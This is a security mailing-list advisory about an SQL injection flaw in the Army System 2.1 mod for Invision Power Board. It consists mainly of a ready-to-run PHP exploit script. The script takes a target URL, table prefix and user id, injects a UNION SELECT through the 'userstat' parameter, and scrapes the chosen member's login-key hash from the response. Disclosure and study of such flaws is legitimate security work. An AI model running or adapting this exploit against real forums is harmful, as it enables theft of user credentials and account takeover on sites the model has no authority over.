[EXPL] Invision Power Board Army System Mod SQL Injection Exploit

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Invision Power Board Army System Mod SQL Injection Exploit
------------------------------------------------------------------------


SUMMARY

" <http://mods.invisionize.com/db/index.php/f/3347> Army System v2.1 is a
very popular mods that has a ranking system built-in. This multiple player
rpg can easily be installed on every Invision Power Board v2.x.x"

Army System is prone to an SQL injection vulnerability. This issue is due
to a failure in the application to properly sanitize user-supplied input
passed to the "userstat" parameter, before being used in an SQL query. A
specially crafted URL could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

DETAILS

Vulnerable Systems:
* Invision Board: 2.0.0 Final PHP: 4.1.0 and above
* Invision Board: 2.0.1 PHP: 4.3.0 and above
* Invision Power Board Army System Mod 2.1 and prior

Exploit:
<?php
/* --------------------------- EXPLOIT ---------------------------
Invision Power Board Army System Mod 2.1 SQL Injection Exploit
Tested on: Latest version (2.1.0)
Discovered on: 06.02.2006 by Alex & fRoGGz
Credits to: SecuBox Labs

PLEASE READ THIS !
The query of the SQL Injection depends about the number of fields in the
sql table
We have successfully tested the exploit on a new fresh IPB 2.1.x with Army
System Mod 2.1 installed

IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

$target = "http://site.com/forums/";; // <--- Where ?
$prefix = "ibf_"; // <--- SQL prefix ?
$id = 1; // <--- Who ?

print_r(get_infos($target,$prefix,$id));
if(!get_infos($target,$prefix,$id)) echo "failed";

function get_infos($target,$prefix,$id) {

$inject =
"index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
$inject.=
"1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
$inject.=
"1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
$inject.=
"NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
$inject.= "NULL+FROM+".$prefix."members+WHERE+id=";

$filename = $target . $inject . $id;

$handle = fopen ($filename, "r");
$infos = array();

if (feof($handle)) { continue 2; }
if ( $handle ) {
while ( ($buffer = fgets( $handle )) )
{
if ( strpos( $buffer, "<td class='pformleft'
width=\"35%\">Name</td>") ) {
$infos['md5'] = strip_tags ( fgets(
$handle) );
break;
}
}
}

fclose ($handle);

if (count($infos) == 1) return $infos;
return false;
}
?>


ADDITIONAL INFORMATION

The information has been provided by <mailto:unsecure@xxxxxxxxxxx> fRoGGz
SecuBox Labs.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages